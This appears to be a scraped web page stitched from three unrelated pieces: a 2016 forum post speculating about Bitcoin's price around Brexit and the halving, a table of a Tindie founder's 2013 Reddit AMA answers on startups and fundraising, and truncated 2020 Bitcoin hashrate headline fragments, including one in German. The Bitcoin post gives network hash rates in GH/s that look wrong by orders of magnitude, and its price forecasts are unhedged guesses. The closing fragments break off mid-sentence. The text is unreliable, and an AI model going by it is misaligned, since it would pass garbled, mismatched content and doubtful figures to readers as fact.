On Brexit, we are a week away from knowing what happens. It seems that if Brexit occurs (eg Britain leaves the EU), it will be largely a big financial mistake for Britain spilling into the region (BTC might rise further, but it's already had a big run up already), and if Brexit fails (eg Britain stays), calm will return to the market and we will see a return from the recent flight to “safe assets”. It’s anyone’s guess what will happen here, and the bookies are predicting a close call. Verdict: either way Brexit goes, BTC fluctuates wildly, compounded by the ever-nearing halving event. China – I’m really not close enough to the action here, however there has been a combination of local and global issues that are driving behavior. The Chinese love a gamble and I suspect as other commentators do to, that this is a big factor on the BTC price too. Verdict: after Brexit, a Chinese rush from closing out their positions will accelerate the price drop. The halving I’m not a miner, but my back of the envelope calculations below is telling me we might be about to hit a “stalling event” if the price per BTC comes nears USD$500 before halving, which could drive panic in the market and cause a massive drop. To use round numbers for simplicity, here’s what the returns have been recently for miners: January 2015 – price per BTC was ~$250 and decreasing. 25BTC reward provided $6,250 per block + ~0.1BTC in transaction fees. Hash rate was approx. 300GH/s. Total return = USD$6,275 per block. July 2015 – price per BTC was ~ $250. 25BTC reward provided $6,250 per block + ~0.15BTC in transaction fees. Hash rate gradually increased approx. 350GH/s. Total return = USD$6287 per block. January 2016 – price per BTC was ~$450. 25BTC reward provided $11,250 per block + ~0.2BTC transaction fees. Hash rate hit increased a bit over double to 800GH/s. Total return = USD$11,340 per block. Now, June 2016 – price per BTC peaks at ~USD$750. 25BTC reward provides $18,750 per block + ~0.4BTC in transaction fees. Hash rate has almost doubled again to 1400GH/s. Total return = USD$19,050 per block. Given the relative flat increase in hash rate when the price remained fairly flat in H1 2015, this tells me is there is a baseline capacity of 300 or so GH/s which cannot operate if the return is less than $6,250 per block + transaction fees (as no-one was adding significant capacity then, perhaps just swapping out equipment). Based on all this, my calculations suggest the make or break price will be around USD$450 per BTC near the time of halving. Mining rewards would equal $5,625, and transaction fees sit around 0.5BTC per block, so total return per block comes to $5,850. Old miners get switched off as it is uneconomic for them to continue, and we lose approx. 300GH/s from the mining pool – approx. 20% overnight. Because the mining difficulty remains in place for a further ~2 weeks, transaction times take a hit given there is less capacity. Panic hits the market driving the price down and transaction volumes up, creating a repeating cycle of a queue of transactions and slow confirmations, greater uncertainty and decreasing prices. People begin to think BTC is “done for” and panic even more, even though it is working exactly as designed. Less efficient miners continue to switch off as the price continues to drop. A few exchanges start having performance issues as they get smashed with web traffic – this actually helps the mining situation (less volume, transactions verified quicker), however given the panic the price doesn’t yet stabilize. People increase their transaction fees to prioritize their trades. We see transaction fees triple to an average around 1.5BTC per block (on 200 transactions it is still a small cost – approx. 0.0075BTC). Panic (and robot trading) continues to drive the price of a BTC down, and it eventually finds a level of support, possibly between USD$200-$250 (range 12 months ago) but – worst case it drops through the floor and hits mid 2013 ranges. There may be no stopping the downward spiral until BIG buyers come back into the market. And there are plenty of them of course, with all the cash on the sidelines from those who sold out earlier, and big funds waiting to pounce on the post-halving correction which they have been hanging out for. Miners begin turning their old kit back on as BTC start to flow from the transaction fees and the price starts increasing, making it economic for them to work again. Fast forward a few weeks, and the price of a BTC has jumped back up to more recent levels (USD$450-$500, maybe higher). The mining difficulty relaxes given the average transaction time went well over 10 minutes. Miners are making about $6,000 per block (12.5BTC), with transaction fees been making up for the decrease in reward. A new norm appears. Survival stories from “the big halving” bring many, many more people in the market, fueling demand and the price follows. BTC lives on, but this time, stronger than before as it has finally grown up. I’m reckoning USD$3000 in 2 years, but the next 4 weeks are going to be a testing time and probably best viewed from the sidelines until the price drops sufficiently to de-risk a purchase. Thoughts welcomed & appreciated – sorry I cannot reply but I’ll be keeping an eye on the thread.
[Table] IamA founder of Tindie, "Etsy for Tech". Started on /r/Arduino, team of 5, just finished fundraising (pitching 50+ investors), and have now closed $1m+ in funding. This is a follow up to last year's AMA, for anyone interested in startups/tech/Silicon Valley/open hardware. AMA!
Verified?(This bot cannot verify AMAs just yet) Date: 2013-12-02 Link to submission (Has self-text)
Great questions - as a maker, our rates are lower than Amazon - flat 5% of the order. We also reach a core audience of people like you, which tends to mean you'll sell more on Tindie vs Amazon. As an example, one seller sold exclusively on Amazon, opened a Tindie store, and we began out selling Amazon. He closed his Amazon store and now sells exclusively on Tindie.
As a buyer, you are joining a community of likeminded people from all over the world and in different niches. Some like audio, some drones, others lighting. In the new year we are launching more features to build out the community side of the site. We are a community marketplace - community comes first. We can do a better job on the community side, and those features are currently being built.
Sounds like you are now at the crossroad where people either keep going, or 'never have the time.' When I started, I'd get the occasional comment online, 'You'll never figure it out.' It's a pretty accurate statement for most. Most don't figure it out. If you can put your head down and just grit it out, you'll get to the other side.
If you want to grit it out, start with Learn Python the Hard Way. Then figure out a project you want to build and go build it. You'll pick things up as you go. You'll think you have it about 10 times before you really have a solid understanding. There were many times I'd talk to my friends and say "Oh I figured it out." I was wrong 10 times :)
It took 1 year to get to n00b level. The next year is when things settle in. After 2 years, you'll have a solid foundation to keep honing your skills. You won't know everything, but you can hack together projects, & figure things out.
Also checkout Stackoverflow. Learning how to properly break down my problems into questions was a great exercise. It helped me understand what the real problem is vs what I thought it was.
I did - my first job after learning how to code was as a developer advocate. Not 'coding' but putting what I learned to good use. That company was acquired, and I eventually became a web engineer at the company which acquired us. That was my last job before starting Tindie.
Good question - the only market validation I did was ask the question on /Arduino. There wasn't a marketplace for this type of hardware (we are still the only "big" site doing what we are doing). The space is emerging now.
You are right. The big question I got from investors is actually - 'How big is the market?' Unfortunately there isn't a good answer for that bc the market is growing / being defined now. Arduino/Raspberry Pi/Drones/3D printers are all just getting started and all growing like weeds. If those platforms become as big as we think they will, then a site like Tindie will have to emerge.
The one thing we look at is the components market is a massive, multibillion dollar market. The type of components that are on Tindie, generally speaking, first come to market on Tindie. The market potential is entirely untapped. However having orders from gov't agencies & large businesses is very reassuring that there is a much greater opportunity than just hobbyists (which is what most people thing on first glance).
Biggest Challenge as CEO - Communication, balancing expectations, keeping everyone on the same page from users, employees to investors. You'll constantly hear, "Did you see X?" when someone thinks it is a competitor. Chances are it isn't and they have their own idea of what the business is which is different than your own.
Wisdom to start a startup - If it is a tech startup, one of your cofounders must be technical. Either yourself or your cofounder. If you can't build the first version/ a proof of concept yourself, start there. If you aren't technical, and don't know anyone technical, learn. In the valley you hear, "I'm looking for a techincal cofounder." so many times its crazy. You either already know someone (a good friend usually) or you don't. Trust me , you won't 'find' a techincal cofounder.
Sure thing - if you hire a 3rd party, you will always have to pay someone else to iterate on the site. There is a 0% chance it will be right on the first shot. Therefore its really an invitation to spend a lot of money down the road - not just the upfront cost you are spending to get your idea made. This is what I did with Knowble - it cost something like $20k+. Please learn from my mistake :) You'll have to iterate, make changes, learn as you go. If you know how to code, then you can make those changes yourself. You'll do it in the morning/nights/weekends and it will only cost you your time.
Very cool! Getting press / outside attention is very difficult (if you don't pay for PR - we don't pay for PR). Write blog posts, like to those sites. The link love will go a long way (over time). Most of the companies that you read about on TechCrunch, PandoDaily, etc are paying for PR which is why they get listed on all of those blogs and have stories come out at the same time (embargoes). As a student, build something! Just keep building things. You have some free time - take full advantage of it. Also meet your peers. Build a network of other students in your class. Some will go to Google, Twitter, the next Google, the next Twitter. Increase your chances of doing well by meeting as many super smart people as you can. Build projects with them. Just make things and learn from experience.
The site was already live, we had products, orders, traffic. The sales early on were ~doubling month over month. Sure they were small but that seems like a very good sign. As it kept growing, people around me connected me with other people interested in the space. The first investor I got was someone that was in my network already, but I didn't know him. He also invests in early stage companies, understands marketplaces, and believes in the changes we are seeing in the hardware space. From introductory call to email saying, "I'd like to invest" was about 12 - 18 hours.
We didn't have to iterate on the site, but I did iterate on the messaging/how I frame what we are doing depending upon the investor, and how that message was received by the last investor. I was constantly iterating what I said from pitch to pitch.
Definitely - 100% worthwile. I had saved up enough to live for a year without a paycheck (without healthcare...not smart but I did it). If you are interested, go for it. While you still have a job start learning HTML, CSS, some basic things. Give yourself some sort of foundation before taking the plunge. After a year won't be able to get a job as an engineer, but it will definitely help in the long run. I have never regretted that decision.
AirPi - Two 17yr olds in London built a shield for Raspberry Pi to turn it into a weather station. Brilliant, cheap product that I never saw coming and has done amazingly. They had to incorporate in the UK, take a loan from their parents, and just shipped hundreds of preorders they got on Tindie. The only thing I know for certain is we will have tens of thousands of hardware companies emerge over the next few years because it is becoming cheaper to prototype and easier to manufacture in lower volumes. Yes "hardware is hard" but it is getting easier and that only opens the door for more people to come in.
Tapster - a robot for manual app testing on mobile devices. EVERY mobile app developer in the world should have one bc of the time you'll save.
Good question - you'll need to figure out where your initial users are and tell them what you are doing. Get people in your corner. As you build the site, give them updates, let them sign up before the site is live. If you don't have enough users on day 1, do more to drive more users to the site. Launch only when you have some amount of users (few hundred or maybe a few thousand is the best case scenario). You'll never be ready to launch but definitely give yourself some momentum before opening the doors.
I did this by keeping everyone on /Arduino in the loop. As I found a name, a domain, logo, I'd share those updates. Sellers were able to sign up and "stock the shelves" prior to launch which meant once I opened the site for transactions, we had ~20 sellers/ products on the site and orders on day 1.
Not right now. Bitcoin is too volatile. From talking with other marketplaces that implemented Bitcoin, the % of transactions that come through are very, very small. Most people seem to be holding Bitcoins as an investment strategy (the gold analogy). I think that is true. At this point, we can get a much bigger bang for our engineering buck by working on other features vs implementing/maintaing Bitcoin or a similar digital currency.
I had been in SF for 4 years, then moved to Portland after the last company I was at was acquired. I moved back bc missed friends and our head of engineering is in Mountain View too. Made sense from a personal perspective.
Would I move to the valley if I didn't already have a connection to the area? I'm not sure. It is definitely cheaper to live somewhere else. However it is more difficult to get into the community from outside the area. If you live in the the valley, you'll constantly hear about startups/tech and meet people who are part of the scene. It's easier to be a part of the conversation if you are in the area.
Very true. It is very common for people to stay at a job for one year, vest 25% of your options, and leave for the next hot startup. It is valuable to have a presence in the valley - but not necessary for your team to all be there. I'm a huge fan of distributed businesses.
Hey Chris! I think it will gain in complexity - esp as parts come down in price, and manufacturing lower quantities becomes more accessible. The opportunities only get magnified as those two trends accelerate.
I think we will always have low level / low end products, but the sky is the limit - in terms of price point and customers. We already have products that cost pennies to $1k+. We will begin to have more consumerish products - but I think those will fuel growth in hardware. The more interesting products emerge, the more interested people will jump into diy. Very cyclical. Arduino & Raspberry Pi just make that first step so much easier. Gateway hardware drugs.
It is difficult but not impossible. Things to plan for: taxes & attorney fees. You'll want to set up your business correctly if you plan on raising outside investment. If you don't do that right up front, you'll get bit when you fundraise. The legal fees we'll have for this financing round will be over $10k I bet (probably more)
Google is your best friend. There are books, tutorials, but just dive in. If you have some coding background just get started. Fortunately that is where I started so its more a process of picking something up and playing around (vs starting from 0).
Thanks! A this point it is just closing and collecting checks so the final % will be set in a few weeks once we have a definitive amount closed with this round. However the answer you are looking for is 20%-25%.
At this time last year, I forget where we were with users but we had $3600 in sales that month which would be about 100 orders. When talking to early stage investors, it is very much a gamble. The chance of failure much higher, but then again the opportunity is great. I haven't asked them point blank, but I think it ultimately boils down to they have an idea of how the world will work in the future, and you fit in that narrative.
We don't right now and don't have any plans to in the future. Copying answer from another question "Bitcoin is too volatile. From talking with other marketplaces that implemented Bitcoin, the % of transactions that come through are very, very small. Most people seem to be holding Bitcoins as an investment strategy (the gold analogy). I think that is true. At this point, we can get a much bigger bang for our engineering buck by working on other features vs implementing/maintaing Bitcoin or a similar digital currency."
Good question - once you are ready, you can list it as a Fundraiser (our version of crowfunding which really is just accepting preorders). It has to hit the min # of units sold to 'live' where we bill the orders and you fulfill those ordered. That will give you a good idea of the initial demand. Shipping & handling you'll need to do a little testing on your end bc it depends where you are located & the shipping service you select. Refunds we can handle on our end. You'll just need to tell us which orders to refund. If you have any other questions, feel free to email us at support(at) tindie.com. More than happy to help!
100% from networking. Friend introducing me to someone else, who says you should talk to X. That person sends the intro, and then schedule a meeting. Cold emails don't get you very far with the top investors who are constantly being bombarded with pitches.
Depends ultimately on the investor and if they are the lead or a follow on investor. The lead must believe in the space, have some idea of what is going, and therefore be passionate about the opportunity.
Follow on investors might know something about the space, might not. The one thing I didn't realize is how much they just "pile on." Most investors look for a signal by another big name investor, and if they are investing, looks good and they want in! The pile on mentality is alive and well.
Build it first. If you get traction on the idea/project, investors will be interested. If it is just an idea, you'll have a very tough time. The only real answer - build it and they will come (if it is a great project and they see potential).
I think any hardware product today should have an open equivalent. The opportunity is just sitting there for someone to build an open version of X. Open source if a flywheel. Once you get it started and there is a community to support it, it only becomes stronger and better. At the end of the day, I don't see much difference btwn producer vs educator. If you have an open project, part of your job will be education. Just start working on something. At the end of the day, if you want to produce it and sell it you can. If not, no harm/no foul.
Good question - some investors you won't get along with. You'll have different ideas/ look at the world differently/ it just isn't a fit. If that is the case, probably not a good fit as a major investor in your company. The can email you rather frequently - don't want to hate that part of your job...
Unfortunately not. Get more experienced & become a solid JS developer. Build projects, open the code, get feedback, critiqued by the JS community. You'll have a lot of value as a seasoned JS dev (esp as Node picks up traction)
I'm anti-patent. It is a huge time/money suck and ultimately hinders innovation. I'm not the best person to ask on researching your design/idea/ etc but I'd probably just go ahead build it and go for it. Any time you spend looking for conflicting patents, someone else will launch their version and get a leg up.
We can definitely do a better job on that end. Since you all have an engineering background, most likely the biggest problem will come in execution - sourcing manufacturers, parts, work abroad vs a domestic manufacturer. PM me and we can definitely help!
Bitcoin hashrate jumped 23 percent since May 26, signaling more miners are resuming operations on the cryptocurrency’s blockchain network.The rally also continued as Bitcoin’s mining difficulty dropped by over 9 percent on June 4.The rising hashrate indicates a slowdown in miner capitulation, which could assist in sending the bitcoin price higher towards $10,000.The Bitcoin hashrate […] Bitcoin tweeted out to it’s 58 thousand plus followers that their hashrate has it another all-time high, experiencing a 15% increase in the last two weeks. Bitcoin Hashrate Constantly Climbing This recent jump and constant rise in hashrate over the past few months shows a consistent level of interest in mining the digital token, despite […] Share to facebook Share to twitter Share to linkedin Photo by Chesnot Getty Images Bitcoin is in a bull market and is not having a bear market rally. Next stop is $11,000. Two things are driving this: 1) Coronavirus. Bitcoin (BTC) is flight/safe haven capital and the global fear of this... Morgan Stanley Strategist Recommends Bitcoin as Central Banks… September 13, 2020. Bitcoin. Bitcoin whale cluster at $10,570 is the most… September 12, 2020. Bitcoin. Huge ‘Bitcoin Tram’ Ad Campaign and 20 Billboards… September 12, 2020. Bitcoin. Bullish pennant hints at Bitcoin price breakout to… September 12, 2020. Bitcoin. Growing Bitcoin Hashrate Points to Further BTC Gains ... Meanwhile, others are putting the blame on technological metrics, like hash rate, which refers to the speed of a bitcoin miner's performance. Joe DiPasquale, CEO of Bitbull Capital, believes that ...
Bitcoin HASH RATE skyrockets! Cryptocurrency Bucks the Trend!! Oobit Pass Crypto and Bitcoin News
Bitcoin is a 'Screaming Buy' https://www.ccn.com/crypto-bull-like-amazon-stock-bitcoin-is-a-screaming-buy/ #Bitcoin Hash Rate to Hit a Whopping 100 Quintilli... Bitcoin's halving (block reward) is fast approaching, and we examine the recently increases hash rate metrics. Oobit Releases A Coinbase-Powered “Skyscanner” For Bitcoin. Singapore-based Oobit ... BITCOIN parabolic runs always begin with the most important bitcoin fundamental going parabolic first. This fundamental is the Bitcoin HASH RATE, and it has been going ballistic over the past year. Well, Litecoin hash rate is down and people are going crazy about it. My thoughts on LTC and LTC hash rate. My thoughts on LTC and LTC hash rate. Cycles of Bitcoin - https://www.tradingview.com ... Außerdem sehen wir uns an warum die Hash Rate um 30% gesunken ist und warum der Bitcoin immernoch Gold 2.0 ist und wie wir dadurch profitieren können. Viel Spaß! Viel Spaß!